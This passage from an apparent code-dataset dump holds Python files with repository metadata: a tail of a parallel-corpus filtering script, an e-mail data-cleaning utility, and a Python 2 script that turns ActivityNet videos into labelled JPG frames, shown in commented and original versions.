        split_line = line.rstrip('\n').split("\t")
        if len(split_line) == 5:
            # 5-column hunalign output: keep only source/target/score.
            split_line = split_line[-3:]
        if len(split_line) == 3:
            source, target, score = split_line
        else:
            assert len(split_line) == 2
            source, target = split_line
        # Python 2: decode raw bytes to unicode, dropping bad sequences.
        source = source.decode('utf-8', 'ignore')
        target = target.decode('utf-8', 'ignore')
        if source == target:
            deletions["identical"].append(target)
            continue
        if not source.strip():
            deletions["source_empty"].append('')
            continue
        elif not target.strip():
            deletions["target_empty"].append('')
            continue
        if float(score) < args.minscore:
            # NOTE(review): for 2-column input ``score`` is the float 1.0,
            # so this join raises TypeError when -minscore > 1 -- confirm.
            deletions["low score"].append("\t".join((source, target, score)))
            continue
        # Length-ratio filters; +15 smooths the ratio for short segments.
        if float((len(source) + 15)) / float(len(target) + 15) > 1.5:
            deletions["source_too_long"].append("%s\t%s" % (source, target))
            continue
        if float((len(target) + 15)) / float(len(source) + 15) > 1.5:
            deletions["source_too_short"].append("%s\t%s" % (source, target))
            continue
        # Language-identification filters on both sides.
        if not lid.is_language(source, args.source_lang):
            deletions["source_lang"].append(source)
            continue
        if not lid.is_language(target, args.target_lang):
            deletions["target_lang"].append(target)
            continue
        args.outfile.write(line)
        n_written += 1
    if args.deleted:
        # Summary plus every removed pair, grouped by removal reason.
        args.deleted.write("Written: %d of %d = %f percent\n" %
                           (n_written, n_total,
                            100. * n_written / max((1, n_total))))
        for reason, deleted in deletions.iteritems():
            args.deleted.write("Deleted %d items due to %s\n"
                               % (len(deleted), reason))
            for line in deleted:
                if line.strip():
                    args.deleted.write("\t%s\n" % line.encode('utf-8'))
| 37.921875 | 78 | 0.563865 |
from collections import defaultdict
import argparse
import cld2
import langid
import sys
class LanguageIdentifier(object):
def __init__(self, use_cld2, valid_languages=None):
self.use_cld2 = use_cld2
self.valid_languages = [l.lower() for l in valid_languages]
if not use_cld2 and valid_languages:
langid.set_languages(self.valid_languages)
def is_language(self, s, expected_lang):
expected_lang = expected_lang.lower()
if self.valid_languages:
assert expected_lang in self.valid_languages
if self.use_cld2:
reliable, _text_bytes, details = cld2.detect(
s.encode("utf-8"),
isPlainText=True,
useFullLangTables=True,
bestEffort=True)
if reliable:
for _lang, langcode, confidence, score in details:
if langcode == expected_lang and confidence >= 10:
return True
return False
else:
return True
else:
lang, confidence = langid.classify(source.lower())
if lang != expected_lang and confidence > 0.9:
return False
else:
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('infile', nargs='?', type=argparse.FileType('r'),
default=sys.stdin)
parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'),
default=sys.stdout)
parser.add_argument('-deleted', help='file to keep deleted lines',
type=argparse.FileType('w'))
parser.add_argument('-minscore', type=float, default=0,
help='minimum score from hunalign')
parser.add_argument('-slang', '--lang1', help='source language',
dest='source_lang', default='en')
parser.add_argument('-tlang', '--lang2', help='target language',
dest='target_lang', default='fr')
parser.add_argument('-cld2', help='use CLD2 instead of langid.py',
action='store_true')
args = parser.parse_args()
deletions = defaultdict(list)
n_written = 0
n_total = 0
lid = LanguageIdentifier(args.cld2, [args.source_lang, args.target_lang])
for line in args.infile:
n_total += 1
score = 1.0
split_line = line.rstrip('\n').split("\t")
if len(split_line) == 5:
split_line = split_line[-3:]
if len(split_line) == 3:
source, target, score = split_line
else:
assert len(split_line) == 2
source, target = split_line
source = source.decode('utf-8', 'ignore')
target = target.decode('utf-8', 'ignore')
if source == target:
deletions["identical"].append(target)
continue
if not source.strip():
deletions["source_empty"].append('')
continue
elif not target.strip():
deletions["target_empty"].append('')
continue
if float(score) < args.minscore:
deletions["low score"].append("\t".join((source, target, score)))
continue
if float((len(source) + 15)) / float(len(target) + 15) > 1.5:
deletions["source_too_long"].append("%s\t%s" % (source, target))
continue
if float((len(target) + 15)) / float(len(source) + 15) > 1.5:
deletions["source_too_short"].append("%s\t%s" % (source, target))
continue
if not lid.is_language(source, args.source_lang):
deletions["source_lang"].append(source)
continue
if not lid.is_language(target, args.target_lang):
deletions["target_lang"].append(target)
continue
args.outfile.write(line)
n_written += 1
if args.deleted:
args.deleted.write("Written: %d of %d = %f percent\n" %
(n_written, n_total,
100. * n_written / max((1, n_total))))
for reason, deleted in deletions.iteritems():
args.deleted.write("Deleted %d items due to %s\n"
% (len(deleted), reason))
for line in deleted:
if line.strip():
args.deleted.write("\t%s\n" % line.encode('utf-8'))
| true | true |
7901014cc741921cf33d5138f384c30d7875b39d | 5,686 | py | Python | stages/utils/utils.py | lif22/tmpm_pipeline | e255616e5f480f02bd0726798f2507316133ede0 | [
"Apache-2.0"
] | null | null | null | stages/utils/utils.py | lif22/tmpm_pipeline | e255616e5f480f02bd0726798f2507316133ede0 | [
"Apache-2.0"
] | null | null | null | stages/utils/utils.py | lif22/tmpm_pipeline | e255616e5f480f02bd0726798f2507316133ede0 | [
"Apache-2.0"
] | null | null | null | from argparse import ArgumentParser
import datetime
import dateutil
import sys, re
from os import path
def parseArgs():
    """Parse command-line arguments.

    Returns a tuple ``(action, arguments)`` where ``action`` is one of
    "discover", "manage" or "settings" and ``arguments`` maps option names
    to values (currently only "file").  Exits the process with an error
    message on invalid input.
    """
    parser = ArgumentParser(add_help=False)
    parser.add_argument("-a", "--action", help="Please select an option out of <discover, manage, settings>", type=str, required=True)
    parser.add_argument("-f", "--file", help="Please specify absolute path to initial dataset", type=str)
    args = parser.parse_args()

    # BUG FIX: removed a hard-coded debug override of args.file (a local
    # Windows path marked "TODO: remove later") that shadowed user input.
    if args.action is None or args.action not in ("discover", "manage", "settings"):
        # BUG FIX: the message used to advertise "manager" although the
        # accepted action is "manage".
        sys.exit('Please specify an action out of <"discover", "manage", "settings">')
    if args.action == "discover" and (args.file is None or not path.exists(args.file)):
        sys.exit("The input file could not be found in the filesystem.")
    arguments = {"file": args.file}
    return args.action, arguments
class DataCleaner:
    """Configurable in-place cleaner for an e-mail DataFrame.

    The DataFrame passed to :meth:`apply` must contain the columns
    "Content", "Datetime", "From" and "To".
    """

    def __init__(self, removeURLs, removeMultWhitespace, lowercasing, dateFormat):
        # Step toggles; dateFormat is the strftime pattern every
        # "Datetime" cell is normalized to.
        self.removeURLs = removeURLs
        self.removeMultWhitespace = removeMultWhitespace
        self.lowercasing = lowercasing
        self.dateFormat = dateFormat

    def apply(self, inputDf):
        """Clean ``inputDf`` in place (mutates "Content" and "Datetime").

        Raises AttributeError when a mandatory cell is empty and
        ValueError when a date cannot be parsed.
        """
        # BUG FIX: ``import dateutil`` alone does not make the ``parser``
        # submodule available; import it explicitly.
        from dateutil import parser as date_parser

        def removeUrl(content):
            return re.sub(r'https?://\S+', '', content)

        def removeMultWhitespace(content):
            return re.sub(r' +', ' ', content)

        # Optional normalization passes over the message body.
        if self.removeURLs:
            inputDf["Content"] = inputDf.apply(lambda row: removeUrl(row["Content"]), axis=1)
        if self.removeMultWhitespace:
            inputDf["Content"] = inputDf.apply(lambda row: removeMultWhitespace(row["Content"]), axis=1)
        if self.lowercasing:
            inputDf["Content"] = inputDf.apply(lambda row: row["Content"].lower(), axis=1)

        # Not-empty constraints on the mandatory columns.
        if inputDf["Content"].isnull().values.any() or \
                inputDf["Datetime"].isnull().values.any() or \
                inputDf["From"].isnull().values.any() or \
                inputDf["To"].isnull().values.any():
            raise AttributeError("Content, Datetime, From and To field cannot be empty. Please check your input dataset.")

        # Unify the date format: reparse (day-first) and reformat.
        def reformatDate(datestring, dateformat):
            try:
                newDate = date_parser.parse(datestring, dayfirst=True)
                return newDate.strftime(dateformat)
            except ValueError as e:
                raise ValueError("Make sure that all datetime columns are well-formatted "
                                 "and that they contain dates that are within the possible bounds.") from e

        inputDf["Datetime"] = inputDf.apply(lambda row: reformatDate(row["Datetime"], self.dateFormat), axis=1)

        # Strip signatures and confidentiality clauses.
        def stripEndClauses(content, clauses):
            # Cut at the earliest (lowest-index) clause occurrence;
            # needle and haystack both lowercased to ignore case.
            clauseIndex = 0
            for item in clauses:
                index = content.lower().find(item.lower())
                if index > -1 and (index < clauseIndex or clauseIndex == 0):
                    clauseIndex = index
            if clauseIndex > 0:
                return content[:clauseIndex]
            return content

        def stripStartClauses(content, clauses):
            # Keep only the text from the latest (highest-index) clause on.
            # NOTE(review): startClausesList below is empty, so this is
            # currently a no-op -- confirm intended behavior before use.
            clauseIndex = 0
            for item in clauses:
                index = content.lower().find(item.lower())
                if index > -1 and (index > clauseIndex or clauseIndex == 0):
                    clauseIndex = index
            if clauseIndex > 0:
                return content[clauseIndex:]
            return content

        startClausesList = []
        endGreetingsList = ["Yours sincerely", "Sincerely", "Sincerely yours", "Take care", "Regards",
                            "Warm regards", "Best regards", "Kind regards", "Warmest regards", "Yours truly", "Yours,",
                            "Warmly,", "Warm wishes", "Best,", "Best Wishes", "Thanks in advance", "Thank you in advance",
                            "Thanks in advance"]
        confList = ["The information contained in this communication",
                    "The content of this email is confidential", "The content of this e-mail", "This email and attachments (if any) is intended",
                    "This email is intended solely", "This e-mail is intended solely"]
        endClausesList = endGreetingsList+confList
        inputDf["Content"] = inputDf.apply(lambda row: stripEndClauses(row["Content"], endClausesList), axis=1)
        inputDf["Content"] = inputDf.apply(lambda row: stripStartClauses(row["Content"], startClausesList), axis=1)

        # Collapse multiple new-lines to one, then replace them by spaces.
        inputDf["Content"] = inputDf.apply(lambda row: re.sub(r'\n+', '\n', row["Content"]), axis=1)
        inputDf["Content"] = inputDf.apply(lambda row: re.sub(r'\n', ' ', row["Content"]), axis=1)
def convertDateString(datestring):
try:
return datetime.datetime.strptime(datestring, "%Y-%m-%d %H:%M:%S")
except ValueError:
return datetime.datetime.strptime(datestring, "%Y-%m-%d %H:%M:%S") | 49.877193 | 145 | 0.616426 | from argparse import ArgumentParser
import datetime
import dateutil
import sys, re
from os import path
def parseArgs():
parser = ArgumentParser(add_help=False)
parser.add_argument("-a", "--action", help="Please select an option out of <discover, manage, settings>", type=str, required=True)
parser.add_argument("-f", "--file", help="Please specify absolute path to initial dataset", type=str)
args = parser.parse_args()
args.file = r"C:\Users\flietz\OneDrive - TU Wien\!Studium\1_MSc\!Diplomarbeit\code\pipeline\resources\dataset\Mail_ApplicationDummy.csv"
if args.action is None or args.action not in ("discover", "manage", "settings"):
sys.exit('Please specify an action out of <"discover", "manager", "settings">')
if args.action == "discover" and (args.file is None or not path.exists(args.file)):
sys.exit("The input file could not be found in the filesystem.")
arguments = {"file": args.file}
return args.action, arguments
class DataCleaner:
def __init__(self, removeURLs, removeMultWhitespace, lowercasing, dateFormat):
self.removeURLs = removeURLs
self.removeMultWhitespace = removeMultWhitespace
self.lowercasing = lowercasing
self.dateFormat = dateFormat
def apply(self, inputDf):
def removeUrl(content):
return re.sub(r'https?://\S+', '', content)
def removeMultWhitespace(content):
return re.sub(r' +', ' ', content)
if self.removeURLs:
inputDf["Content"] = inputDf.apply(lambda row: removeUrl(row["Content"]), axis=1)
if self.removeMultWhitespace:
inputDf["Content"] = inputDf.apply(lambda row: removeMultWhitespace(row["Content"]), axis=1)
if self.lowercasing:
inputDf["Content"] = inputDf.apply(lambda row: row["Content"].lower(), axis=1)
if inputDf["Content"].isnull().values.any() or \
inputDf["Datetime"].isnull().values.any() or \
inputDf["From"].isnull().values.any() or \
inputDf["To"].isnull().values.any():
raise AttributeError("Content, Datetime, From and To field cannot be empty. Please check your input dataset.")
def reformatDate(datestring, dateformat):
try:
newDate = dateutil.parser.parse(datestring, dayfirst=True)
return newDate.strftime(dateformat)
except ValueError as e:
raise ValueError("Make sure that all datetime columns are well-formatted "
"and that they contain dates that are within the possible bounds.") from e
inputDf["Datetime"] = inputDf.apply(lambda row: reformatDate(row["Datetime"], self.dateFormat), axis=1)
def stripEndClauses(content, clauses):
clauseIndex = 0
index = 0
for item in clauses:
index = content.lower().find(item.lower())
if index > -1 and (index < clauseIndex or clauseIndex == 0):
clauseIndex = index
if clauseIndex > 0:
return content[:clauseIndex]
else:
return content
def stripStartClauses(content, clauses):
clauseIndex = 0
index = 0
for item in clauses:
index = content.lower().find(item.lower())
if index > -1 and (index > clauseIndex or clauseIndex == 0):
clauseIndex = index
if clauseIndex > 0:
return content[clauseIndex:]
else:
return content
startClausesList = []
endGreetingsList = ["Yours sincerely", "Sincerely", "Sincerely yours", "Take care", "Regards",
"Warm regards", "Best regards", "Kind regards", "Warmest regards", "Yours truly", "Yours,",
"Warmly,", "Warm wishes", "Best,", "Best Wishes", "Thanks in advance", "Thank you in advance",
"Thanks in advance"]
confList = ["The information contained in this communication",
"The content of this email is confidential", "The content of this e-mail", "This email and attachments (if any) is intended",
"This email is intended solely", "This e-mail is intended solely"]
endClausesList = endGreetingsList+confList
inputDf["Content"] = inputDf.apply(lambda row: stripEndClauses(row["Content"], endClausesList), axis=1)
inputDf["Content"] = inputDf.apply(lambda row: stripStartClauses(row["Content"], startClausesList), axis=1)
inputDf["Content"] = inputDf.apply(lambda row: re.sub(r'\n+', '\n', row["Content"]), axis=1)
inputDf["Content"] = inputDf.apply(lambda row: re.sub(r'\n', ' ', row["Content"]), axis=1)
def convertDateString(datestring):
try:
return datetime.datetime.strptime(datestring, "%Y-%m-%d %H:%M:%S")
except ValueError:
return datetime.datetime.strptime(datestring, "%Y-%m-%d %H:%M:%S") | true | true |
7901016f4be671cdbe0ec7f89bdd3cd39d3243af | 12,384 | py | Python | python-scripts/convertMP4toJPG.py | gurkirt/actNet-inAct | 1930bcb41553e50ddd83985a497a9d5ce4f1fcf2 | [
"MIT"
] | 27 | 2016-05-04T07:13:05.000Z | 2021-12-05T04:45:45.000Z | python-scripts/convertMP4toJPG.py | gurkirt/actNet-inAct | 1930bcb41553e50ddd83985a497a9d5ce4f1fcf2 | [
"MIT"
] | 1 | 2017-12-28T08:29:00.000Z | 2017-12-28T08:29:00.000Z | python-scripts/convertMP4toJPG.py | gurkirt/actNet-inAct | 1930bcb41553e50ddd83985a497a9d5ce4f1fcf2 | [
"MIT"
] | 12 | 2016-05-15T21:40:06.000Z | 2019-11-27T09:43:55.000Z | '''
Autor: Gurkirt Singh
Start data: 2nd May 2016
purpose: of this file is to take all .mp4 videos and convert them to jpg images
'''
import numpy as np
import cv2 as cv2
import math,pickle,shutil,os
baseDir = "/mnt/sun-alpha/actnet/";  # root for generated frame-list files
vidDir = "/mnt/earth-beta/actnet/videos/";  # downloaded .mp4/.mkv videos
imgDir = "/mnt/sun-alpha/actnet/rgb-images/";  # destination for extracted JPG frames
annotPklFile = "../Evaluation/data/actNet200-V1-3.pkl"  # pickled ActivityNet v1.3 database
#os.mkdir(imgDir)
annotFile = "../anetv13.json"  # raw ActivityNet v1.3 JSON annotations
def getAnnotations():
with open(annotFile) as f:
annoData = json.load(f)
taxonomy = annoData["taxonomy"]
version = annoData["version"]
database = annoData["database"]
print len(database),version,len(taxonomy)
def getNumFrames(filename):
cap = cv2.VideoCapture(filename)
if not cap.isOpened():
print "could not open :",filename
return -1
numf = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
return numf
def getVidedInfo(filename):
    """Return (numf, width, height, fps, cap) for a video file.

    On failure returns (0, 0, 0, 0, -1).  On success ``cap`` is the still
    open cv2.VideoCapture handle; the caller is responsible for reading
    from it and releasing it.
    """
    try:
        cap = cv2.VideoCapture(filename)
    except cv2.error as e:
        print e
        return 0,0,0,0,-1
    if not cap.isOpened():
        print "could not open :",filename
        return 0,0,0,0,-1
    # Legacy OpenCV 2.x property constants (cv2.cv namespace).
    numf = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
    width = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH))
    height = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT))
    fps = cap.get(cv2.cv.CV_CAP_PROP_FPS)
    return numf,width,height,fps,cap
def getsmallestDimto256(width,height):
    """Return (width, height) rescaled so the smaller side becomes 256 px.

    The aspect ratio is preserved; the scaled larger side is rounded up.
    """
    if width >= height:
        scale = 256.0 / height
        return int(math.ceil(scale * width)), 256
    scale = 256.0 / width
    return 256, int(math.ceil(scale * height))
def getframelabels(annotations,numf):
    """Return a uint16 array of per-frame class ids for one video.

    Frames outside every annotated interval keep the background id 200;
    frames inside [sf, ef) receive the zero-based action class id.
    """
    framelabels = np.full(numf, 200, dtype='uint16')
    for annotation in annotations:
        class_id = int(annotation['class']) - 1
        framelabels[annotation['sf']:annotation['ef']] = class_id
    return framelabels
def movefiles(storageDir,framelabels,numfs):
    """Rename plain NNNNN.jpg frames to NNNNN-ActIdCCC.jpg in storageDir.

    CCC is the zero-padded per-frame class id from ``framelabels``.
    """
    dst = ''
    for ind in range(numfs):
        label = framelabels[ind]
        src = storageDir+str(ind).zfill(5)+".jpg"
        dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
        shutil.move(src,dst)
    # Log only the last renamed file as a progress marker.
    print dst ,' MOVED '
def convertVideosL():
    """Extract labelled 256x256 JPG frames for all train/validation videos.

    Frames are written as NNNNN-ActIdCCC.jpg; when plain NNNNN.jpg frames
    already exist they are renamed via movefiles() instead of re-decoding.
    Broken or frame-count-mismatching videos are flagged in vids/<id>.txt.
    """
    print "this is convertVideos function with labels"
    ecount = 0
    with open(annotPklFile,'rb') as f:
        actNetDB = pickle.load(f)
    actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
    for videoId in reversed(database.keys()):
        ecount+=1
        if ecount>0:
            videoInfo = database[videoId]
            storageDir = imgDir+'v_'+videoId+"/"
            print videoInfo['subset']
            if not videoInfo['isnull'] and not videoInfo['subset'] == 'testing':
                # Prefer the .mp4 download, fall back to .mkv.
                videoname = vidDir+'v_'+videoId+'.mp4'
                if not os.path.isfile(videoname):
                    videoname = vidDir+'v_'+videoId+'.mkv'
                print storageDir,' ecount ',ecount,videoInfo['subset']
                numfs = videoInfo['numf']
                annotations = videoInfo['annotations']
                framelabels = getframelabels(annotations,numfs)
                imgname = storageDir+str(numfs-1).zfill(5)+".jpg"
                if os.path.isfile(imgname):
                    # Unlabelled frames already extracted: just rename them.
                    movefiles(storageDir,framelabels,numfs)
                else:
                    dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
                    if not os.path.isfile(dst):
                        numf,width,height,fps,cap = getVidedInfo(videoname)
                        if not cap == -1 and numf == numfs:
                            newW=256;newH=256;
                            framecount = 0;
                            if cap.isOpened():
                                if not os.path.isdir(storageDir):
                                    os.mkdir(storageDir)
                                for ind in xrange(numf):
                                    label = framelabels[ind]
                                    dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
                                    retval,image = cap.read()
                                    if not image is None:
                                        resizedImage = cv2.resize(image,(newW,newH))
                                        cv2.imwrite(dst,resizedImage)
                                    else:
                                        # Decode failure: re-write the previous frame.
                                        # NOTE(review): if the very first frame fails,
                                        # resizedImage is undefined here (NameError).
                                        cv2.imwrite(dst,resizedImage)
                                    print ' . ',
                                print dst , 'is created'
                        else:
                            # Flag unreadable / frame-count-mismatching videos.
                            with open('vids/'+videoId+'.txt','wb') as f:
                                f.write('error')
                    else:
                        print dst , 'is already there'
def convertTestVideos():
    """Extract 256x256 JPG frames for the testing subset.

    Test videos have no annotations, so every frame gets the background
    label 200 in its file name (NNNNN-ActId200.jpg).
    """
    print "this is convertVideos function with labels"
    ecount = 0
    with open(annotPklFile,'rb') as f:
        actNetDB = pickle.load(f)
    actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
    for videoId in database.keys():
        ecount+=1
        if ecount>0:
            videoInfo = database[videoId]
            storageDir = imgDir+'v_'+videoId+"/"
            print videoInfo['subset']
            if not videoInfo['isnull'] and videoInfo['subset'] == 'testing':
                # Prefer the .mp4 download, fall back to .mkv.
                videoname = vidDir+'v_'+videoId+'.mp4'
                if not os.path.isfile(videoname):
                    videoname = vidDir+'v_'+videoId+'.mkv'
                print storageDir,' ecount ',ecount,videoInfo['subset']
                numfs = videoInfo['numf']
                # annotations = videoInfo['annotations']
                # All frames are background for the test subset.
                framelabels = np.ones(numfs,dtype='uint16')*200;
                imgname = storageDir+str(numfs-1).zfill(5)+".jpg"
                if os.path.isfile(imgname):
                    # Unlabelled frames already extracted: just rename them.
                    movefiles(storageDir,framelabels,numfs)
                else:
                    dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
                    if not os.path.isfile(dst):
                        numf,width,height,fps,cap = getVidedInfo(videoname)
                        if not cap == -1 and numf == numfs:
                            newW=256;newH=256;
                            framecount = 0;
                            if cap.isOpened():
                                if not os.path.isdir(storageDir):
                                    os.mkdir(storageDir)
                                for ind in xrange(numf):
                                    label = framelabels[ind]
                                    dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
                                    retval,image = cap.read()
                                    if not image is None:
                                        resizedImage = cv2.resize(image,(newW,newH))
                                        cv2.imwrite(dst,resizedImage)
                                    else:
                                        # Decode failure: re-write the previous frame.
                                        # NOTE(review): undefined resizedImage if the
                                        # very first frame fails to decode.
                                        cv2.imwrite(dst,resizedImage)
                                    print ' . ',
                                print dst , 'is created'
                        else:
                            # Flag unreadable / frame-count-mismatching videos.
                            with open('vids/'+videoId+'.txt','wb') as f:
                                f.write('error')
                    else:
                        print dst , 'is already there'
def convertVideos():
    """Extract plain (unlabelled) NNNNN.jpg frames for every downloaded video.

    Resizes every frame to 256x256 and skips videos whose last frame image
    already exists.  Unreadable videos are flagged in vids/<name>.txt.
    """
    print "this is convertVideos function"
##    vidDir = vidDirtemp
    vidlist = os.listdir(vidDir)
    vidlist = [vid for vid in vidlist if vid.startswith("v_")]
    print "Number of sucessfully donwloaded ",len(vidlist)
    vcount =0
    for videname in reversed(vidlist):
        vcount+=1
        if vcount>0:
            src = vidDir+videname
            numf,width,height,fps,cap = getVidedInfo(src)
            if not cap == -1:
                newW=256;newH=256;
                print videname, width,height,' and newer are ',newW,newH, ' fps ',fps,' numf ', numf, ' vcount ',vcount
                framecount = 0;
                storageDir = imgDir+videname.split('.')[0]+"/"
                imgname = storageDir+str(numf-1).zfill(5)+".jpg"
                # Last expected frame missing -> (re)extract the video.
                if not os.path.isfile(imgname):
                    if cap.isOpened():
                        if not os.path.isdir(storageDir):
                            os.mkdir(storageDir)
                        for f in xrange(numf):
                            retval,image = cap.read()
                            if not image is None:
#                                print np.shape(retval),np.shape(image), type(image),f
                                resizedImage = cv2.resize(image,(newW,newH))
                                imgname = storageDir+str(framecount).zfill(5)+".jpg"
                                cv2.imwrite(imgname,resizedImage)
                            else:
                                # Decode failure: re-write the previous frame.
                                # NOTE(review): undefined resizedImage if the
                                # very first frame fails to decode.
                                imgname = storageDir+str(framecount).zfill(5)+".jpg"
                                cv2.imwrite(imgname,resizedImage)
                                print 'we have missing frame ',framecount
                            framecount+=1
                            print imgname
            else:
                # Flag videos that could not be opened at all.
                with open('vids/'+videname.split('.')[0]+'.txt','wb') as f:
                    f.write('error')
def getframelabels4both(annotations,numf,subset):
    """Like getframelabels(), but 'testing' videos stay all background (200)."""
    framelabels = np.full(numf, 200, dtype='uint16')
    if subset == 'testing':
        return framelabels
    for annotation in annotations:
        framelabels[annotation['sf']:annotation['ef']] = int(annotation['class']) - 1
    return framelabels
def genVideoImageLists():
subset = 'testing'
print "this is genVideoImageLists function"
ecount = 0; vcount = 0;
listname = '{}lists/{}.list'.format(baseDir,subset)
fid = open(listname,'wb')
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in database.keys():
ecount+=1
if ecount>0:
videoInfo = database[videoId]
if not videoInfo['isnull'] and videoInfo['subset'] == subset:
vcount+=1
storageDir = imgDir+'v_'+videoId+"/"
videlistName = '{}lists/{}/v_{}.list'.format(baseDir,subset,videoId)
fid.write(videlistName+'\n');
vfid = open(videlistName,'wb');
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
annotations = videoInfo['annotations']
framelabels = getframelabels4both(annotations,numfs,subset)
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if os.path.isfile(dst):
for ind in xrange(numfs):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
vfid.write(dst+'\n')
else:
RuntimeError('check if file exists '+dst)
def checkConverted():
    """Move videos whose frame extraction is incomplete out of vidDir.

    NOTE(review): ``vidDirtemp`` is not defined anywhere in this file (it
    only appears in a commented-out line in convertVideos), so the
    ``dst = vidDirtemp+videname`` line raises NameError as soon as a
    readable video is reached -- define it before running.
    """
    print "this is checkConverted videos function"
    vidlist = os.listdir(vidDir)
    vidlist = [vid for vid in vidlist if vid.endswith(".mp4")]
    print "Number of sucessfully donwloaded ",len(vidlist)
    vcount =0
    for videname in vidlist[15000:]:  # resume from index 15000
        src = vidDir+videname
        numF = getNumFrames(src)
        if numF>0:
            imgname = imgDir+videname.split('.')[0]+"/"+str(numF-1).zfill(5)+".jpg"
            print 'last frame is ',imgname,' vocunt ',vcount
            vcount+=1
            dst = vidDirtemp+videname
            # Last expected frame missing -> park the video for re-extraction.
            if not os.path.isfile(imgname):
                shutil.move(src,dst)
                print " moved this one to ", dst
if __name__=="__main__":
    # Entry point: earlier pipeline stages are kept for reference; only
    # the list-generation step is currently enabled.
#    checkConverted()
#    convertVideosL()
#    convertTestVideos()
    genVideoImageLists()
| 42.851211 | 120 | 0.505087 | '''
Autor: Gurkirt Singh
Start data: 2nd May 2016
purpose: of this file is to take all .mp4 videos and convert them to jpg images
'''
import numpy as np
import cv2 as cv2
import math,pickle,shutil,os
baseDir = "/mnt/sun-alpha/actnet/";
vidDir = "/mnt/earth-beta/actnet/videos/";
imgDir = "/mnt/sun-alpha/actnet/rgb-images/";
annotPklFile = "../Evaluation/data/actNet200-V1-3.pkl"
annotFile = "../anetv13.json"
def getAnnotations():
with open(annotFile) as f:
annoData = json.load(f)
taxonomy = annoData["taxonomy"]
version = annoData["version"]
database = annoData["database"]
print len(database),version,len(taxonomy)
def getNumFrames(filename):
cap = cv2.VideoCapture(filename)
if not cap.isOpened():
print "could not open :",filename
return -1
numf = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
return numf
def getVidedInfo(filename):
try:
cap = cv2.VideoCapture(filename)
except cv2.error as e:
print e
return 0,0,0,0,-1
if not cap.isOpened():
print "could not open :",filename
return 0,0,0,0,-1
numf = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))
width = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH))
height = int(cap.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.cv.CV_CAP_PROP_FPS)
return numf,width,height,fps,cap
def getsmallestDimto256(width,height):
if width>=height:
newH = 256
newW = int(math.ceil((float(newH)/height)*width))
else:
newW = 256
newH = int(math.ceil((float(newW)/width)*height))
return newW,newH
def getframelabels(annotations,numf):
framelabels = np.ones(numf,dtype='uint16')*200;
for annot in annotations:
actionId = annot['class']
startframe = annot['sf']
endframe = annot['ef']
framelabels[startframe:endframe] = int(actionId)-1
return framelabels
def movefiles(storageDir,framelabels,numfs):
dst = ''
for ind in range(numfs):
label = framelabels[ind]
src = storageDir+str(ind).zfill(5)+".jpg"
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
shutil.move(src,dst)
print dst ,' MOVED '
def convertVideosL():
print "this is convertVideos function with labels"
ecount = 0
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in reversed(database.keys()):
ecount+=1
if ecount>0:
videoInfo = database[videoId]
storageDir = imgDir+'v_'+videoId+"/"
print videoInfo['subset']
if not videoInfo['isnull'] and not videoInfo['subset'] == 'testing':
videoname = vidDir+'v_'+videoId+'.mp4'
if not os.path.isfile(videoname):
videoname = vidDir+'v_'+videoId+'.mkv'
print storageDir,' ecount ',ecount,videoInfo['subset']
numfs = videoInfo['numf']
annotations = videoInfo['annotations']
framelabels = getframelabels(annotations,numfs)
imgname = storageDir+str(numfs-1).zfill(5)+".jpg"
if os.path.isfile(imgname):
movefiles(storageDir,framelabels,numfs)
else:
dst = storageDir+str(numfs-1).zfill(5)+'-ActId'+str(framelabels[-1]).zfill(3)+'.jpg'
if not os.path.isfile(dst):
numf,width,height,fps,cap = getVidedInfo(videoname)
if not cap == -1 and numf == numfs:
newW=256;newH=256;
framecount = 0;
if cap.isOpened():
if not os.path.isdir(storageDir):
os.mkdir(storageDir)
for ind in xrange(numf):
label = framelabels[ind]
dst = storageDir+str(ind).zfill(5)+'-ActId'+str(label).zfill(3)+'.jpg'
retval,image = cap.read()
if not image is None:
resizedImage = cv2.resize(image,(newW,newH))
cv2.imwrite(dst,resizedImage)
else:
cv2.imwrite(dst,resizedImage)
print ' . ',
print dst , 'is created'
else:
with open('vids/'+videoId+'.txt','wb') as f:
f.write('error')
else:
print dst , 'is already there'
def convertTestVideos():
print "this is convertVideos function with labels"
ecount = 0
with open(annotPklFile,'rb') as f:
actNetDB = pickle.load(f)
actionIDs = actNetDB['actionIDs']; taxonomy=actNetDB['taxonomy']; database = actNetDB['database'];
for videoId in database.keys():
ecount+=1
if ecount>0:
videoInfo = database[videoId]
storageDir = imgDir+'v_'+videoId+"/"
print videoInfo['subset']
if not videoInfo['isnull'] and videoInfo['subset'] == 'testing':
videoname = vidDir+'v_'+videoId+'.mp4'
